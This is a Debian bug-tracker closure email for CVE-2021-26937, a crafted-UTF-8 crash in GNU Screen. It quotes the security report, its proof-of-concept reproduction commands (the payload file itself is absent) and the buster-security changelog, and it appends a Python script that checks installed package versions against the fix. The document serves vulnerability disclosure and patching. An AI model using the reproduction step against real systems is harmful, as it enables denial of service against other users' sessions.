Your message dated Wed, 24 Feb 2021 17:33:44 +0000
with message-id <e1ley2i-000d2p...@fasolo.debian.org>
and subject line Bug#982435: fixed in screen 4.6.2-3+deb10u1
has caused the Debian Bug report #982435,
regarding screen: CVE-2021-26937
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
982435: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=982435
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: screen
Version: 4.8.0-3
Severity: grave
Tags: security upstream
Forwarded: https://lists.gnu.org/archive/html/screen-devel/2021-02/msg00000.html
X-Debbugs-Cc: car...@debian.org, Debian Security Team <t...@security.debian.org>

Hi,

The following vulnerability was published for screen, filing it for
now as RC severity, feel free to downgrade if you disagree.

CVE-2021-26937[0]:
| encoding.c in GNU Screen through 4.8.0 allows remote attackers to
| cause a denial of service (invalid write access and application crash)
| or possibly have unspecified other impact via a crafted UTF-8
| character sequence.

To reproduce the issue and crash screen:

$ cat poc.base64
$ base64 -d poc.base64 | gzip -d -

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2021-26937
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26937
[1] https://lists.gnu.org/archive/html/screen-devel/2021-02/msg00000.html
[2] https://www.openwall.com/lists/oss-security/2021/02/09/3
[3] https://savannah.gnu.org/bugs/?60030

Regards,
Salvatore

--- End Message ---
--- Begin Message ---
Source: screen
Source-Version: 4.6.2-3+deb10u1
Done: Axel Beckert <a...@debian.org>

We believe that the bug you reported is fixed in the latest version of
screen, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 982...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Axel Beckert <a...@debian.org> (supplier of updated screen package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Sat, 20 Feb 2021 21:59:38 +0100
Source: screen
Architecture: source
Version: 4.6.2-3+deb10u1
Distribution: buster-security
Urgency: high
Maintainer: Axel Beckert <a...@debian.org>
Changed-By: Axel Beckert <a...@debian.org>
Closes: 982435
Changes:
 screen (4.6.2-3+deb10u1) buster-security; urgency=high
 .
   * [CVE-2021-26937] Fix invalid write access and application crash or
     possibly unspecified other impact via a crafted UTF-8 character
     sequence. (Closes: #982435)
Checksums-Sha1:
 9b0bc2089e7af72bf52010615e2316ed5de8b849 2344 screen_4.6.2-3+deb10u1.dsc
 0434d4c45d0b5bb339551511e10a9b2c4ec6a789 845210 screen_4.6.2.orig.tar.gz
 024239ed073a50e383185ee1e8d6b755aaeff8ca 879 screen_4.6.2.orig.tar.gz.asc
 726b3db75de2e0f3e8eb75c208a5c44e3ac34b09 47732 screen_4.6.2-3+deb10u1.debian.tar.xz
 c8563933b16968b6d747f737f3e96a7cc80836a1 6736 screen_4.6.2-3+deb10u1_source.buildinfo
Checksums-Sha256:
 148626d94c58fbb93ee4e574f8e6ab10aa80d76316823c88e888d361af428bf3 2344 screen_4.6.2-3+deb10u1.dsc
 1b6922520e6a0ce5e28768d620b0f640a6631397f95ccb043b70b91bb503fa3a 845210 screen_4.6.2.orig.tar.gz
 3e88b06e8ec3a24860bae77f1578d555194faa86049a0da899a00fe8bd218a40 879 screen_4.6.2.orig.tar.gz.asc
 b18b9fdd4389d004cbee1eec691ab3e5702a072cd6e10f03995e358292ebee23 47732 screen_4.6.2-3+deb10u1.debian.tar.xz
 45a7e88671d89994154b09944738da21d80b6d682da3ecce809d602bfb93abcf 6736 screen_4.6.2-3+deb10u1_source.buildinfo
Files:
 3071a644f67ac4684eb7017e2a448024 2344 misc standard screen_4.6.2-3+deb10u1.dsc
 a0f529d3333b128dfaa324d978ba73a8 845210 misc standard screen_4.6.2.orig.tar.gz
 d81a6ad00d88b2721915809480c8c62d 879 misc standard screen_4.6.2.orig.tar.gz.asc
 e41cca61a5c18102862a359da42a6342 47732 misc standard screen_4.6.2-3+deb10u1.debian.tar.xz
 904cd09bbbcac5f5008aa4c7a4feed76 6736 misc standard screen_4.6.2-3+deb10u1_source.buildinfo

-----BEGIN PGP SIGNATURE-----
-----END PGP SIGNATURE-----

--- End Message ---
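As an added example (not part of the bug report, the closure mail, or Debian's own tooling), the following Python script answers the question a buster administrator has after reading this closure: is the installed screen at or above 4.6.2-3+deb10u1? It re-implements the dpkg version ordering from Debian Policy (epoch, then upstream version, then Debian revision; digit runs compare numerically and `~` sorts before everything, including the end of the string) so that a suffix such as `+deb10u1` is ordered correctly after the plain `-3` revision. The only fixed version it knows is the buster one taken from the .changes file above; the `dpkg-query` invocation is a real command and is simply skipped when it is not available, and the version strings in the comments and tests are constructed for illustration.

```python
"""Check whether the installed Debian 'screen' package carries the
CVE-2021-26937 fix by comparing its version against the fixed version
announced for buster-security (4.6.2-3+deb10u1).

The comparison re-implements dpkg's version ordering so that, for
example, 4.6.2-3+deb10u1 sorts after 4.6.2-3 and 4.6.2~rc1 before 4.6.2.
"""
import subprocess
from typing import Optional, Tuple

# Fixed version taken from the buster-security upload in the .changes file.
FIXED_VERSIONS = {"buster": "4.6.2-3+deb10u1"}


def _order(c: str) -> int:
    """Weight of one character in dpkg's non-digit comparison."""
    if c == "" or c.isdigit():
        return 0
    if c.isalpha():
        return ord(c)
    if c == "~":
        return -1          # tilde sorts before anything, even end of string
    return ord(c) + 256    # other punctuation sorts after letters


def _verrevcmp(a: str, b: str) -> int:
    """Compare two upstream-version or revision strings dpkg-style."""
    while a or b:
        first_diff = 0
        # Non-digit run: compare character weights one by one.
        while (a and not a[0].isdigit()) or (b and not b[0].isdigit()):
            ac, bc = _order(a[:1]), _order(b[:1])
            if ac != bc:
                return ac - bc
            a, b = a[1:], b[1:]
        # Digit run: drop leading zeros; the longer run of digits is larger,
        # otherwise the first differing digit decides.
        a, b = a.lstrip("0"), b.lstrip("0")
        while a[:1].isdigit() and b[:1].isdigit():
            if not first_diff:
                first_diff = ord(a[0]) - ord(b[0])
            a, b = a[1:], b[1:]
        if a[:1].isdigit():
            return 1
        if b[:1].isdigit():
            return -1
        if first_diff:
            return first_diff
    return 0


def parse_version(version: str) -> Tuple[int, str, str]:
    """Split [epoch:]upstream[-revision]; a missing epoch is 0, a missing
    revision is the empty string (which dpkg treats as equal to '0')."""
    epoch = 0
    if ":" in version:
        epoch_str, version = version.split(":", 1)
        epoch = int(epoch_str)
    if "-" in version:
        upstream, revision = version.rsplit("-", 1)
    else:
        upstream, revision = version, ""
    return epoch, upstream, revision


def compare_versions(v1: str, v2: str) -> int:
    """Return <0, 0 or >0 as v1 is older than, equal to or newer than v2."""
    e1, u1, r1 = parse_version(v1)
    e2, u2, r2 = parse_version(v2)
    if e1 != e2:
        return e1 - e2
    rc = _verrevcmp(u1, u2)
    if rc != 0:
        return rc
    return _verrevcmp(r1, r2)


def is_fixed(installed: str, suite: str = "buster") -> bool:
    """True if the installed version is at or above the suite's fixed version."""
    return compare_versions(installed, FIXED_VERSIONS[suite]) >= 0


def installed_screen_version() -> Optional[str]:
    """Ask dpkg for the installed screen version; None if not available."""
    try:
        out = subprocess.run(
            ["dpkg-query", "-W", "-f=${Version}", "screen"],
            capture_output=True, text=True, check=True,
        )
    except (OSError, subprocess.CalledProcessError):
        return None
    return out.stdout.strip() or None


if __name__ == "__main__":
    version = installed_screen_version()
    if version is None:
        print("screen is not installed or dpkg-query is unavailable")
    else:
        verdict = "fixed" if is_fixed(version) else "VULNERABLE (CVE-2021-26937)"
        print(f"screen {version}: {verdict}")
```

The comparison is deliberately kept independent of `apt`/`dpkg --compare-versions` so the same logic can be run over a version inventory exported from many hosts; `is_fixed` only knows the buster fix version stated in this closure, so add other suites only from their own security announcements.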
